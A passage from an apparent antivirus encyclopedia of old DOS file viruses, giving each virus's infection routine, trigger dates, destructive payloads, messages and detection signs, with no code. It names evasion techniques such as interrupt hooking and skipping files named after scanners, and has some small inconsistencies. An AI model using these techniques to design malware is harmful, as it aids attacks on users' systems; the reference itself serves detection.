  13066.  
  13067. [Seacat]
  13068. Virus Name: Seacat
  13069. Virus Type: File Virus (COM files)
  13070. Virus Length:  1600 bytes
  13071.  
  13072. Execution Procedure:
  13073. The virus searches for an uninfected COM file on the current directory,
  13074. then infects it (only infects one file at a time).
  13075.  
  13076. Damage: None
  13077.  
  13078. Note:
  13079. 1) It does not stay resident in the memory.
  13080. 2) An error message appears when writing because INT 24h has not been
  13081.    hanged.
  13082.  
  13083. Detection method: Infected files increase by 1600 bytes.
  13084.  
  13085. [Wake]
  13086. Virus Name: Wake
  13087. Virus Type: File Virus (EXE files)
  13088. Virus Length:
  13089.  
  13090. Execution Procedure:
  13091. The virus searches for all uninfected EXE files on the current
  13092. directory, then infects them (only infects one file at a time).
  13093.  
  13094. Damage: It overwrites the original files with the virus code, thus
  13095. corrupting the files.
  13096.  
  13097. Note:
  13098. 1) It does not stay resident in the memory.
  13099. 2) An error message appears when writing because INT 24h has not been
  13100.    hanged.
  13101.  
  13102. [T-1000-B]
  13103. Virus Name: T-1000-B
  13104. Virus Type: File Virus (COM files)
  13105. Virus Length:
  13106.  
  13107. Execution Procedure:
  13108. The virus searches for all uninfected COM files on the current
  13109. directory, then infects them (only infects one file at a time).
  13110.  
  13111. Damage: It overwrites the original files with the virus code, thus
  13112. corrupting the files.
  13113.  
  13114. Note:
  13115. 1) It does not stay resident in the memory.
  13116. 2) An error message appears when writing because INT 24h has not been
  13117.    hanged.
  13118.  
  13119. [Soupy]
  13120. Virus Name: Soupy
  13121. Virus Type: FIle Virus (COM files)
  13122. Virus Length:  1072 bytes
  13123.  
  13124. Execution Procedure:
  13125. The virus searches for an uninfected COM file on the current directory,
  13126. then infects it (only infects one file at a time).
  13127.  
  13128. Damage: None
  13129.  
  13130. Note:
  13131. 1) It does not stay resident in the memory.
  13132. 2) An error message appears when writing because INT 24h has not been
  13133.    hanged.
  13134.  
  13135. Detection method: Infected files increase by 1072 bytes.
  13136.  
  13137. [Small-Exe]
  13138. Virus Name: Small-Exe
  13139. Virus Type: File Virus (EXE files)
  13140. Virus Length:  349 bytes
  13141.  
  13142. Execution Procedure:
  13143. The virus searches for an uninfected EXE file on the current directory,
  13144. then infects it (only infects one file at a time). After infection, the
  13145. virus halts the system.
  13146.  
  13147. Damage: The virus halts the system every time it infects a file.
  13148.  
  13149. Note:
  13150. 1) It does not stay resident in the memory.
  13151. 2) An error message appears when writing because INT 24h has not been
  13152.    hanged.
  13153.  
  13154. Detection method: Infected files increase by 349 bytes.
  13155.  
  13156. [Toys]
  13157. Virus Name: Toys
  13158. Virus Type: File Virus (COM and EXE files)
  13159. Virus Length:  773 bytes
  13160.  
  13161. Execution Procedure:
  13162. The virus searches for uninfected COM and EXE files on the current
  13163. directory, then infects them (infects two files at a time).
  13164.  
  13165. Damage: None
  13166.  
  13167. Note:
  13168. 1) It does not stay resident in the memory.
  13169. 2) An error message appears when writing because INT 24h has not been
  13170.    hanged.
  13171.  
  13172. Detection method: Infected files increase by 773 bytes.
  13173.  
  13174. [Leper]
  13175. Virus Name: Leper
  13176. Virus Type: File Virus (COM and EXE files)
  13177. Virus Length:
  13178.  
  13179. Execution Procedure:
  13180. The virus searches for uninfected COM and EXE files on the current
  13181. directory, then infects them (infects four files at a time).
  13182.  
  13183. Damage: It overwrites the original files with the virus code, thus
  13184. corrupting the files.
  13185.  
  13186. Note:
  13187. 1) It does not stay resident in the memory.
  13188. 2) An error message appears when writing because INT 24h has not been
  13189.    hanged.
  13190.  
  13191. [Arcv-7]
  13192. Virus Name: Arcv-7
  13193. Virus Type: File Virus (EXE files)
  13194. Virus Length:  541 bytes
  13195.  
  13196. Execution Procedure:
  13197. The virus searches for an uninfected EXE file on the current directory,
  13198. then infects it (only infects one file at a time).
  13199.  
  13200. Damage: None
  13201.  
  13202. Note:
  13203. 1) Because the virus infection program is not well written, the
  13204.    system will halt when an infected program is executed.
  13205. 2) It does not stay resident in the memory.
  13206. 3) An error message appears when writing because INT 24h has not been
  13207.    hanged.
  13208.  
  13209. Detection method: Infected files increase by 541 bytes.
  13210.  
  13211. [Arcv-6]
  13212. Virus Name: Arcv-6
  13213. Virus Type: File Virus (COM files)
  13214. Virus Length:  335 bytes
  13215.  
  13216. Execution Procedure:
  13217. The virus searches for an uninfected COM file on the current directory,
  13218. then infects it (only infects one file at a time).
  13219.  
  13220. Damage: None
  13221.  
  13222. Note:
  13223. 1) It does not stay resident in the memory.
  13224. 2) An error message appears when writing because INT 24h has not been
  13225.    hanged.
  13226.  
  13227. Detection method: Infected files increase by 335 bytes.
  13228.  
  13229. [Arcv-5]
  13230. Virus Name: Arcv-5
  13231. Virus Type: File Virus (COM files)
  13232. Virus Length:  475 bytes
  13233.  
  13234. Execution Procedure:
  13235. The virus searches for an uninfected COM file on the current directory,
  13236. then infects it (only infects one file at a time).
  13237.  
  13238. Damage: None
  13239.  
  13240. Note:
  13241. 1) It does not stay resident in the memory.
  13242. 2) An error message appears when writing because INT 24h has not been
  13243.    hanged.
  13244.  
  13245. Detection method: Infected files increase by 475 bytes.
  13246.  
  13247. [Exper-416]
  13248. Virus Name: Exper-416
  13249. Virus Type: File Virus (COM files)
  13250. Virus Length:  416 bytes
  13251.  
  13252. Execution Procedure:
  13253. The virus searches for all uninfected COM files on the current
  13254. directory, then infects them.
  13255.  
  13256. Damage: None
  13257.  
  13258. Note:
  13259. 1) It does not stay resident in the memory.
  13260. 2) An error message appears when writing because INT 24h has not been
  13261.    hanged.
  13262.  
  13263. Detection method: Infected files increase by 416 bytes.
  13264.  
  13265. [Ash-B]
  13266. Virus Name: Ash-B
  13267. Virus Type: File Virus (COM files)
  13268. Virus Length:  280 bytes
  13269.  
  13270. Execution Procedure:
  13271. The virus searches for all uninfected COM files on the current
  13272. directory, then infects them.
  13273.  
  13274. Damage: None
  13275.  
  13276. Note:
  13277. 1) It does not stay resident in the memory.
  13278. 2) An error message appears when writing because INT 24h has not been
  13279.    hanged.
  13280.  
  13281. Detection method: Infected files increase by 280 bytes.
  13282.  
  13283. [Scribble]
  13284. Virus Name: Scribble
  13285. Virus Type: File Virus (COM and EXE files)
  13286. Virus Length:
  13287.  
  13288. Execution Procedure:
  13289. The virus searches for all uninfected COM and EXE files on the
  13290. current directory, then infects them.
  13291.  
  13292. Damage: It overwrites the original files with the virus code, thus
  13293. corrupting the files.
  13294.  
  13295. Note:
  13296. 1) It does not stay resident in the memory.
  13297. 2) An error message appears when writing because INT 24h has not been
  13298.    hanged.
  13299.  
  13300. [Simple 1992]
  13301. Virus Name: Simple-1992
  13302. Virus Type: File Virus (COM files)
  13303. Virus Length:  424 bytes
  13304.  
  13305. Execution Procedure:
  13306. The virus searches for all uninfected COM files on the current
  13307. directory, then infects them. (Virus will also infect COMMAND.COM.)
  13308.  
  13309. Damage: None
  13310.  
  13311. Note:
  13312. 1) It does not stay resident in the memory.
  13313. 2) An error message appears when writing because INT 24h has not been
  13314.    hanged.
  13315.  
  13316. Detection method: Infected files increase by 424 bytes.
  13317.  
  13318. [Schrunch]
  13319. Virus Name: Schrunch
  13320. Virus Type: File Virus (COM files)
  13321. Virus Length:  420 bytes
  13322.  
  13323. Execution Procedure:
  13324. The virus displays the following message:
  13325.  
  13326.     "S C H R U N CH     E M     U P  T I M E."
  13327.  
  13328. The virus then searches for all uninfected COM files on the current
  13329. directory, then proceeds to infect them.
  13330.  
  13331. Damage: None
  13332.  
  13333. Note:
  13334. 1) It does not stay resident in the memory.
  13335. 2) An error message appears when writing because INT 24h has not been
  13336.    hanged.
  13337.  
  13338. Detection method:
  13339. 1) Infected files increase by 420 bytes.
  13340. 2) The virus displays the above message when an infected file is
  13341.    executed.
  13342.  
  13343. [CV4]
  13344. Virus Name: Cv4
  13345. Virus Type: File Virus (COM files)
  13346. Virus Length:  321 bytes
  13347.  
  13348. Execution Procedure:
  13349. The virus displays the following message:
  13350.  
  13351.     "This file infected with COMVIRUS 1.0."
  13352.  
  13353. The virus then searches for an uninfected COM file on the current
  13354. directory and proceeds to infect it (only infects one file at a
  13355. time).
  13356.  
  13357. Damage: None
  13358.  
  13359. Note:
  13360. 1) It does not stay resident in the memory.
  13361. 2) An error message appears when writing because INT 24h has not been
  13362.    hanged.
  13363.  
  13364. Detection method:
  13365. 1) Infected files increase by 321 bytes.
  13366. 2) The virus displays the above message when an infected file is
  13367.    executed.
  13368.  
  13369. [Arcv-3A]
  13370. Virus Name: Arcv-3a
  13371. Virus Type: File Virus (COM files)
  13372. Virus Length:  657 bytes
  13373.  
  13374. Execution Procedure:
  13375. 1) Searches for all uninfected COM files on the current directory,
  13376.    then infects them.
  13377. 2) Checks whether the current calendar month is February. If it is, the
  13378.    virus displays the following:
  13379.  
  13380.     "I've just Found a Virus.. Oops.. Sorry I'm the virus...Well
  13381.      let me introduce myself.. I am ARCV-3 Virus, by Apache
  13382.      Warrior... Long Live The ARCV and What s an Hard ECU?.. Vote
  13383.      Yes to the Best Vote ARCV..."
  13384.  
  13385. Damage: None
  13386.  
  13387. Note:
  13388. 1) It does not stay resident in the memory.
  13389. 2) An error message appears when writing because INT 24h has not been
  13390.    hanged.
  13391.  
  13392. Detection method: Infected files increase by 657 bytes.
  13393.  
  13394. [Anti_Daf]
  13395. Virus Name: Anti_Daf
  13396. Virus Type: File Virus (COM files)
  13397. Virus Length:  561 bytes
  13398.  
  13399. Execution Procedure:
  13400. 1) Searches for an uninfected COM file on the current directory,
  13401.    then infects it (only infects one file at a time).
  13402. 2) Checks whether the current month is November, and the current day
  13403.    is Monday. If these conditions are met, the virus displays the
  13404.    message below, and then destroys all data on the hard disk.
  13405.  
  13406.     "The Anti_Daf virus.. DAF-TRUCKSE indhoven.. Hugo vd Goeslaan
  13407.      1..postbus 90063..6500 PREindhoven, The Netherlands.  .. DAF
  13408.      sucks..... (c) 1992 Dark Helmet & The Virus Research Centre"
  13409.  
  13410. Damage: The virus sometimes destroys all data on the hard disk.
  13411.  
  13412. Note:
  13413. 1) It does not stay resident in the memory.
  13414. 2) An error message appears when writing because INT 24h has not been
  13415.    hanged.
  13416.  
  13417. Detection method: Infected files increase by 561 bytes.
  13418.  
  13419. [Manola]
  13420. Virus Name: Manola
  13421. Virus Type: File Virus (COM files)
  13422. Virus Length:  831 bytes
  13423.  
  13424. Execution Procedure:
  13425. The virus checks whether the current day is 7. If it is, the virus
  13426. displays the following message and then reboots the system:
  13427.  
  13428.     "The Atomic Dustbin 2B - I'm Here To Stay".
  13429.  
  13430. If the above condition is not met, the virus searches for an
  13431. uninfected COM file on the current directory, then infects it (infects
  13432. only one file at a time).
  13433.  
  13434. Damage: The virus sometimes reboots the system.
  13435.  
  13436. Note:
  13437. 1) It does not stay resident in the memory.
  13438. 2) An error message appears when writing because INT 24h has not been
  13439.    hanged.
  13440.  
  13441. Detection method: Infected files increase by 831 bytes.
  13442.  
  13443. [Seneca-A]
  13444. Virus Name: Seneca-A
  13445. Virus Type: File Virus (EXE files)
  13446. Virus Length:
  13447.  
  13448. Execution Procedure:
  13449. 1) Searches for all uninfected EXE files on the current directory,
  13450.    then infects them.
  13451. 2) Checks whether the current date is November 25. If it is, the virus
  13452.    displays the following message and then destroys all data on the
  13453.    hard disk:
  13454.  
  13455.         "Its Seneca's B_DAY
  13456.          let's party   !!!"
  13457.  
  13458. Damage: The virus sometimes destroys all data on the hard disk.
  13459.  
  13460. Note:
  13461. 1) It does not stay resident in the memory.
  13462. 2) An error message appears when writing because INT 24h has not been
  13463.    hanged.
  13464.  
  13465. [Seneca-B]
  13466. Virus Name: SENECA-B
  13467. Virus Type: File Virus
  13468. Virus Length:
  13469.  
  13470. Execution Procedure:
  13471. 1) Searches for all (*.*) uninfected files on the current directory,
  13472.    then infects them.
  13473. 2) Checks whether the current date is November 25. If it is, the virus
  13474.    displays the following message and then destroys all data on the
  13475.    hard disk:
  13476.  
  13477.         "Its Seneca's B_DAY
  13478.          let's party   !!!"
  13479.  
  13480. Damage: The virus sometimes destroys all data on the hard disk.
  13481.  
  13482. Note:
  13483. 1) It does not stay resident in the memory.
  13484. 2) An error message appears when writing because INT 24h has not been
  13485.    hanged.
  13486.  
  13487. [Mog]
  13488. Virus Name: Mog
  13489. Virus Type: File Virus (COM files)
  13490. Virus Length:  328 bytes
  13491.  
  13492. Execution Procedure:
  13493. 1) The virus searches for all uninfected COM files on the current
  13494.    directory, then infects them. The virus then displays the
  13495.    following message:
  13496.  
  13497.        " Maccabi Yafo !!!!!"
  13498.  
  13499. 2) Checks whether the current date is February 25. If it is, the virus
  13500.    halts the system.
  13501.  
  13502. Damage: The virus sometimes halts the system.
  13503.  
  13504. Note:
  13505. 1) It does not stay resident in the memory.
  13506. 2) An error message appears when writing because INT 24h has not been
  13507.    hanged.
  13508.  
  13509. Detection method: Infected files increase by 328 bytes.
  13510.  
  13511. [LZ2]
  13512. Virus Name: Lz2
  13513. Virus Type: File Virus (EXE files)
  13514. Virus Length:  3000-8000 bytes
  13515.  
  13516. Execution Procedure:
  13517. The virus searches for an uninfected EXE file on the current directory,
  13518. then infects it (only infects one file at a time). The method of
  13519. infection is: it creates a new COM file with the same name as the
  13520. EXE file. This new COM file is the virus. Its length is 3000-8000 bytes.
  13521.  
  13522. Damage: None
  13523.  
  13524. Note:
  13525. 1) It does not stay resident in the memory.
  13526. 2) An error message appears when writing because INT 24h has not been
  13527.    hanged.
  13528. 3) The procedure at the beginning of the virus is encrypted in LZEXE
  13529.    mode. PCSCAN cannot scan this virus.
  13530.  
  13531. [Silver-3D]
  13532. Virus Name: Silver-3d
  13533. Virus Type: File Virus (COM and EXE files)
  13534. Virus Length:
  13535.  
  13536. Execution Procedure:
  13537. The virus searches for an uninfected COM or EXE file on the current
  13538. directory, then infects it (infects four files at a time).
  13539. The virus then displays the following message:
  13540.  
  13541.     "Program too big to fit in memory."
  13542.  
  13543. Damage:
  13544. 1) It overwrites the original files with the virus code, thus
  13545.    corrupting the files.
  13546. 2) If the virus cannot find an uninfected file, it will display "PLO
  13547.    VIRUS RESEARCH TEAM" in enlarged font. The virus then halts the
  13548.    system.
  13549.  
  13550. Detection method:
  13551. 1) The length of infected COM files is 8101 bytes.
  13552. 2) Executed infected files will display the following message:
  13553.  
  13554.    "Program too big to fit in memory" or
  13555.    "PLO VIRUS RESEARCH TEAM."
  13556.  
  13557. [Silly-Willy]
  13558. Virus Name: Silly-Willy
  13559. Virus Type: File Virus (COM and EXE files)
  13560. Virus Length:
  13561.  
  13562. Execution Procedure:
  13563. 1) When executing an infected COM program, it will infect files
  13564.    only when the current year is between 1988 and 1992.  When
  13565.    infecting files, the virus will search for an uninfected COM and
  13566.    EXE files on the current directory, then infects them. The virus
  13567.    will only infect one COM file and EXE file at a time.
  13568. 2) Executing an infected EXE program will not infect other files.
  13569.    At this time, a smiling face is displayed on the screen
  13570.    Furthermore, when any key is depressed, the following message
  13571.    will be displayed:
  13572.  
  13573.    "Hello ! I'm Silly-Willy
  13574.     Now, I'm formatting your HARDDISK.........."
  13575.  
  13576.    (It does not really format the hard disk). If there is a diskette
  13577.    in drive A, all data on this diskette will be destroyed and the
  13578.    virus will proceed to hang the system.
  13579.  
  13580. Damage: The virus sometimes destroys all data on the diskette in
  13581. drive A and halts the system.
  13582.  
  13583. [Stupid 1]
  13584. Virus Name: Stupid 1, July 4
  13585. Virus Type: File Virus (COM files)
  13586. Virus Length:  743 bytes
  13587.  
  13588. Execution Procedure:
  13589. 1) If the word at address 0000:01FEh is FFFFh, the virus will not
  13590.    infect any file.
  13591. 2) When the virus infects files, it will infect all uninfected COM
  13592.    files on the current directory. If the number of infection is less
  13593.    than 2, it will go on infecting all COM files on the upper
  13594.    directory until the number is larger than 2 or it has reached
  13595.    the root directory. It will check whether the current date is July 4
  13596.    and current time is 0:00am, 1:00am, 2:00am, 3:00am, 4:00am, or
  13597.    5:00am. If these conditions are met, the virus will proceed to
  13598.    destroy data on the current diskette.
  13599.  
  13600. Detection method:
  13601. 1) Date and time fields of infected files are changed.
  13602. 2) Byte at 0003h of an infected COM file is 1Ah.
  13603. 3) Infected COM file displays the following message:
  13604.  
  13605.          "Abort, Retry, Ignore, Fail?" ,
  13606.          "Fail on INT 24"
  13607.    (2) - "Impotence error reading users disk"
  13608.    (0) - "Program too big to fit in memory"
  13609.    (1) - "Cannot load COMMAND, system halted"
  13610.    (3)"Joker!" and "*.com."
  13611.  
  13612. 4) The virus displays the above message when executing an
  13613.    infected file.
  13614.  
  13615. [Klf-356]
  13616. Virus Name: Klf-356
  13617. Virus Type: File Virus (COM files)
  13618. Virus Length:  356 bytes
  13619.  
  13620. PC Vectors Hooked: INT 21h, INT 24h
  13621.  
  13622. Execution Procedure:
  13623. 1) Checks whether it is memory resident. If not, it loads itself
  13624.    resident in the high memory.
  13625. 2) Hooks INT 21h and goes back to the original routine.
  13626.  
  13627. Infection Procedure:
  13628. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  13629.    prevent divulging its trace when writing. If the program to be
  13630.    executed is an uninfected COM file, the virus proceeds to infect it.
  13631.  
  13632. Damage: None
  13633.  
  13634. Detection method: Infected files increase by 356 bytes.
  13635.  
  13636. [April 998]
  13637. Virus Name: April 998
  13638. Virus Type: File Virus
  13639.             Virus infects .EXE files which are greater than 10h.
  13640.             Virus is a memory resident.
  13641. Virus Length: 998 bytes (file), 1104 bytes (memory)
  13642.  
  13643. PC Vectors Hooked: INT 21h
  13644.  
  13645. Infection Process: This virus is spread by executing an infected
  13646. program. When an April, 1998 infected program is executed, it will
  13647. check to see if it already resident in the memory. If so, it will
  13648. execute the infected program. The virus stays resident at the top of
  13649. the MCB (memory control block) but below the DOS 640k boundary.
  13650.  
  13651. Damage: Virus writes garbage to the C drive from relative sector 0 to
  13652. sector Feh when the system date is April of any year.
  13653.  
  13654. Symptoms:  The available free memory will decrease by 1104 bytes.
  13655.  
  13656. Note: This virus doesn't infect files named: "SCAN*", "CLEA*",
  13657. "VIRS*","F-PR*" OR "CPAV*"
  13658.  
  13659. [17-768]
  13660. Virus Name:  17-768
  13661. Virus Type: File Virus
  13662.             Virus infects .COM and .EXE files shorter than 59920
  13663.             bytes. Memory resident.
  13664. Virus Length: 768 (300h) bytes (file), 800 (320h) bytes (memory)
  13665.  
  13666. PC Vectors Hooked: INT 09h, INT 21h
  13667.  
  13668. Infection Process: This virus is a variant of the November-17th
  13669. virus: If the system date is equal to 17 November, and the value
  13670. of [40:46E] is not the same as the virus backup value of [40:46E]
  13671. when the virus is resident, it will destroy the current disk beginning
  13672. from sector 1 to sector 8. The first time a program infected
  13673. with November 17th is executed, the virus will install itself
  13674. memory resident at the top of the system memory but below the 640K
  13675. DOS boundary.
  13676.  
  13677. Damage: Virus destroys the current disk from sector 1 to sector 8. By
  13678. progressive action, the virus will insert garbage in these sectors
  13679. when the date is the 17th of November.
  13680.  
  13681. Symptoms:  File size increase of 855 bytes. Available free memory
  13682. decreases by 896 bytes.
  13683.  
  13684. Note: The November 17th virus was detected in January, 1992.  Its
  13685. origin or point of original isolation was originally unknown, but
  13686. it has since been reported as being widespread in Rome, Italy in
  13687. December, 1991. November 17th is a memory resident infector of
  13688. .COM and .EXE programs, including COMMAND.COM.
  13689.  
  13690. [Jeff]
  13691. Virus Name: Jeff
  13692. Virus Type: File Virus (COM files)
  13693. Virus Length:  815-820 bytes
  13694.  
  13695. Execution Procedure:
  13696. The virus searches for an uninfected COM file on the current directory,
  13697. then infects it. It only infects one file at a time.
  13698.  
  13699. Damage: None
  13700.  
  13701. Note:
  13702. 1) It does not stay resident in the memory.
  13703. 2) An error message appears when writing because INT 24h has not been
  13704.    hanged.
  13705.  
  13706. Detection method: Infected files increase by 815-820 bytes.
  13707.  
  13708. [Ill]
  13709. Virus Name: Ill
  13710. Virus Type: File Virus (COM files)
  13711. Virus Length:  1016 bytes
  13712.  
  13713. Execution Procedure:
  13714. The virus searches for an uninfected COM file on the current directory,
  13715. then infects it. It only infects one file at a time.
  13716.  
  13717. Damage: None
  13718.  
  13719. Note:
  13720. 1) It does not stay resident in the memory.
  13721. 2) An error message appears when writing because INT 24h has not been
  13722.    hanged.
  13723.  
  13724. Detection method: Infected files increase by 1016 bytes.
  13725.  
  13726. [Iero-512-560]
  13727. Virus Name: Iero-512-560
  13728. Virus Type: File Virus (COM files)
  13729. Virus Length:  512 or 560 bytes
  13730.  
  13731. PC Vectors Hooked: INT 21h, INT 08h
  13732.  
  13733. Execution Procedure:
  13734. 1) Checks whether it is memory resident. If not, it loads itself
  13735.    resident in the high memory.
  13736. 2) Hooks INT 21h and goes back to the original routine.
  13737.  
  13738. Infection Procedure:
  13739. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13740.    is an uninfected COM file, the virus proceeds to infect it.
  13741. 2) Hooks INT 08h to check the current time. At some random point in
  13742.    time, it will display the following message:
  13743.  
  13744.     "Mulier pulchr aest janua diab oli , .. via iniq uitatis,
  13745.     scorpion is percussio. .St. Ieronim.."
  13746.  
  13747. Damage: None
  13748.  
  13749. Note:
  13750. 1) An error message appears when writing because INT 24h has not been
  13751.    hanged.
  13752. 2) While the virus is memory resident, the available memory decreases
  13753.    by 1. You can check this by using MEM.EXE.
  13754.  
  13755. Detection method: Infected files increase by 512 or 560 bytes.
  13756.  
  13757. [Iernim]
  13758. Virus Name: Iernim
  13759. Virus Type: File Virus (COM files)
  13760. Virus Length:  570 or 600 bytes
  13761.  
  13762. PC Vectors Hooked: INT 21h, INT 08h
  13763.  
  13764. Execution Procedure:
  13765. 1) Checks whether it is memory resident. If not, it loads itself
  13766.    resident in the high memory.
  13767. 2) Hooks INT 21h and goes back to the original routine.
  13768.  
  13769. Infection Procedure:
  13770. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13771.    is an uninfected COM file, the virus proceeds to infect it.
  13772. 2) Hooks INT 08h to check the current time. At some random point in
  13773.    time, it will display the following message:
  13774.  
  13775.     "Mulier pulchra est janua diaboli , .. via iniquitatis,
  13776.     scorpionis percussio ..St. Ieronim.."
  13777.  
  13778. Damage: None
  13779.  
  13780. Note:
  13781. 1) An error message appears when writing because INT 24h has not been
  13782.    hanged.
  13783. 2) While the virus is memory resident, the available memory decreases
  13784.    by 1. You can check this by using MEM.EXE.
  13785.  
  13786. Detection method: Infected files increase by 570 or 600 bytes.
  13787.  
  13788. [Horror]
  13789. Virus Name: Horror
  13790. Virus Type: File Virus (COM and EXE files)
  13791. Virus Length:  1112-1182 bytes
  13792.  
  13793. PC Vectors Hooked: INT 21h, INT 24h
  13794.  
  13795. Execution Procedure:
  13796. 1) Checks whether it is memory resident. If not, it loads itself
  13797.    resident in the high memory.
  13798. 2) Hooks INT 21h.
  13799. 3) Checks whether COMMAND.COM that booted up the system is infected
  13800.    or not. If not, the virus infects it and goes back to original
  13801.    routine.
  13802.  
  13803. Infection Procedure:
  13804. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  13805.    prevent divulging its trace when writing. If the program to be
  13806.    executed is an uninfected COM or EXE file, the virus proceeds to
  13807.    infect it.
  13808.  
  13809. Damage: It destroys all data on the hard disk (Every variant of
  13810. the virus has its own infection time).
  13811.  
  13812. Note: The Soft-mice software is destroyed by infected EXE programs.
  13813.  
  13814. Detection method: Infected files increase by 1112-1182 bytes.
  13815.  
  13816. [I-B]
  13817. Virus Name: I-B
  13818. Virus Type: File Virus (COM files)
  13819. Virus Length:
  13820.  
  13821. Execution Procedure:
  13822. The virus searches for all uninfected COM files on all directories,
  13823. and infects them. No matter whether it has infected a file or not,
  13824. this virus will check whether the current day is Monday. If it is,
  13825. the virus proceeds to destroy all data on the hard disk.
  13826.  
  13827. Damage:
  13828. 1) It sometimes destroys all data on the hard disk.
  13829. 2) It overwrites the original files with the virus code, thus
  13830.    corrupting the files.
  13831.  
  13832. Note:
  13833. 1) It does not stay resident in the memory.
  13834. 2) An error message appears when writing because INT 24h has not been
  13835.    hanged.
  13836.  
  13837. [Cr-2480b]
  13838. Virus Name: Cr-2480b
  13839. Virus Type: File Virus (COM files)
  13840. Virus Length:  2480 bytes
  13841.  
  13842. Execution Procedure:
  13843. The virus searches for an uninfected COM file on the current directory,
  13844. then infects it (It only infects one file at a time).
  13845.  
  13846. Damage: None
  13847.  
  13848. Note:
  13849. 1) It does not stay resident in the memory.
  13850. 2) An error message appears when writing because INT 24h has not been
  13851.    hanged.
  13852.  
  13853. Detection method: Infected files increase by 2480 bytes.
  13854.  
  13855. [Md-354]
  13856. Virus Name: Md-354
  13857. Virus Type: File Virus (COM files)
  13858. Virus Length:  354 bytes
  13859.  
  13860. Execution Procedure:
  13861. The virus searches for an uninfected COM file on the current directory,
  13862. then infects it (It only infects one file at a time).
  13863.  
  13864. Damage: None
  13865.  
  13866. Note:
  13867. 1) It does not stay resident in the memory.
  13868. 2) An error message appears when writing because INT 24h has not been
  13869.    hanged.
  13870.  
  13871. Detection method: Infected files increase by 354 bytes.
  13872.  
  13873. [Los-693]
  13874. Virus Name: Los-693
  13875. Virus Type: File Virus (COM files)
  13876. Virus Length: 693 bytes
  13877.  
  13878. PC Vectors Hooked: INT 21h, INT 24h
  13879.  
  13880. Execution Procedure:
  13881. 1) Checks whether it is memory resident. If not, it loads itself
  13882.    resident in the high memory.
  13883. 2) Hooks INT 21h and goes back to the original routine.
  13884.  
  13885. Infection Procedure:
  13886. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  13887.    prevent divulging its trace when writing. If the program to be
  13888.    executed is an uninfected COM file, the virus proceeds to infect it.
  13889.  
  13890. Damage:
  13891. There is a virus flag in the partition (initial value is zero).
  13892. The value will increase by 1 every time the virus infects a file. When
  13893. this flag is larger than 223, the virus hooks INT 08h. One minute later,
  13894. characters will start to fall down on the screen. The virus then halts
  13895. the system.
  13896.  
  13897. Detection method: Infected files increase by 693 bytes.
  13898.  
  13899. [Bung1422]
  13900. Virus Name: Bung1422
  13901. Virus Type: File Virus (COM files)
  13902. Virus Length: 1442 bytes
  13903.  
  13904. PC Vectors Hooked: INT 21h, INT 24h
  13905.  
  13906. Execution Procedure:
  13907. 1) Checks whether it is memory resident. If not, it loads itself
  13908.    resident in the high memory.
  13909. 2) Hooks INT 21h and goes back to the original routine.
  13910. 3) Checks whether the current date is September 20. If it is, the virus
  13911.    displays the following message:
  13912.  
  13913.     "Jonhan Bonhn  - September 20 1980
  13914.     -  L E D  Z E P P E L I N  -"
  13915.  
  13916. Infection Procedure:
  13917. 1) Hooks INT 21H(AH=4Bh). First, it hangs INT 24h to prevent divulging
  13918.    its trace when writing. If the program to be executed is an
  13919.    uninfected COM file, the virus infects it directly. If the program
  13920.    to be executed is an EXE file, it will search for an uninfected COM
  13921.    file and infect it. Lastly, the virus restores INT 24h.
  13922.  
  13923. Damage: None
  13924.  
  13925. Detection method: Infected files increase by 1422 bytes.
  13926.  
  13927. [Src-377]
  13928. Virus Name: Src-377
  13929. Virus Type: File Virus (COM files)
  13930. Virus Length: 377 bytes
  13931.  
  13932. Execution Procedure:
  13933. The virus searches for all uninfected COM files on all directories,
  13934. and proceeds to infect them.
  13935.  
  13936. Damage:
  13937. If the hard disk is divided into more than one partition, and the
  13938. system is booted up from the second partition (D drive), all data on
  13939. this drive will be corrupted.
  13940.  
  13941. Note:
  13942. 1) It does not stay resident in the memory.
  13943. 2) An error message appears when writing because INT 24h has not been
  13944.    hanged.
  13945.  
  13946. Detection method: Infected files increase by 377 bytes.
  13947.  
  13948. [Mini-195]
  13949. Virus Name: Mini-195
  13950. Virus Type: File Virus (COM files)
  13951. Virus Length: 195 or 218 bytes
  13952.  
  13953. Execution Procedure:
  13954. The virus searches for an uninfected #*.COM file ("#" indicates a
  13955. character from 'A' to 'Z', like A*.com, F*.COM, X*.COM) on the
  13956. current directory, and infects it.
  13957.  
  13958. Damage: None
  13959.  
  13960. Note:
  13961. 1) It does not stay resident in the memory.
  13962. 2) An error message appears when writing because INT 24h has not been
  13963.    hanged.
  13964.  
  13965. Detection method: Infected files increase by 195 or 218 bytes.
  13966.  
  13967. [Gold]
  13968. Virus Name: Gold
  13969. Virus Type: File Virus (COM and EXE files)
  13970. Virus Length:  612 bytes
  13971.  
  13972. PC Vectors Hooked: INT 21h
  13973.  
  13974. Execution Procedure:
  13975. 1) Checks whether it is memory resident. If not, it loads itself
  13976.    resident in the high memory.
  13977. 2) Hooks INT 21h and goes back to the original routine.
  13978.  
  13979. Infection Procedure:
  13980. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13981.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  13982.    After it has infected the file, the virus has a 50% chance of going
  13983.    back to the original routine. The other possibility is for the virus
  13984.    to display random characters and end without executing the original
  13985.    routine.
  13986.  
  13987. Damage: None
  13988.  
  13989. Note: An error message appears when writing because INT 24h has not
  13990. been hanged.
  13991.  
  13992. Detection method: Infected files increase by 612 bytes.
  13993.  
  13994. [Hard-Day]
  13995. Virus Name: Hard-Day
  13996. Virus Type: File Virus (COM files)
  13997. Virus Length:  662 bytes
  13998.  
  13999. PC Vectors Hooked: INT 21h
  14000.  
  14001. Execution Procedure:
  14002. 1) Checks whether it is memory resident. If not, it loads itself
  14003.    resident in the high memory.
  14004. 2) Hooks INT 21h and goes back to the original routine.
  14005.  
  14006. Infection Procedure:
  14007. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14008.    is an uninfected COM file, the virus proceeds to infect it.
  14009.  
  14010. Damage:
  14011. If the current calendar day is Monday and current time is 18:00 later,
  14012. the virus halts the system after displaying the following message:
  14013.  
  14014.     "Hard day's night !"
  14015.  
  14016. Note: An error message appears when writing because INT 24h has not
  14017. been hanged.
  14018.  
  14019. Detection method: Infected files increase by 662 bytes.
